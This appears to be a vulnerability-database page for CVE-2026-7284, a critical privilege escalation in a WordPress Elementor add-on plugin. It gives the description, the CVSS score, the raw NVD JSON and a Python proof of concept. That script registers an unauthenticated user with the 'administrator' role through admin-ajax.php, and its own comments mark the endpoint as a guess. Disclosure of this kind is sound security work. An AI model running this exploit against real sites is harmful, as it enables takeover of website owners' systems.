Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-7284 CVSS 9.8 CRITICAL

CVE-2026-7284

Published: 2026-05-20 02:16:39
Last Modified: 2026-05-20 13:54:55
Source: [email protected]

Description

The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the 'easyel_handle_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Easy Elements for Elementor <= 1.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import requests def exploit(target_url, username, email): # Target endpoint might be /wp-admin/admin-ajax.php or a specific custom route # Based on the function name 'easyel_handle_register', it's likely an action. url = f"{target_url}/wp-admin/admin-ajax.php" payload = { "action": "easyel_handle_register", # Generic guess based on function name "user_login": username, "user_email": email, "role": "administrator" # The vulnerable parameter } try: response = requests.post(url, data=payload) if response.status_code == 200: print(f"[+] Potential success. Check if user {username} was created as admin.") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://target-site.com" exploit(target, "hacker_admin", "[email protected]")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7284", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:39.083", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the 'easyel_handle_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.0/widgets/login-register/class.login-register.php#L62", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3534530/easy-elements#file728", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/32b6ccfe-a659-41e4-9cec-146f4f910071?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.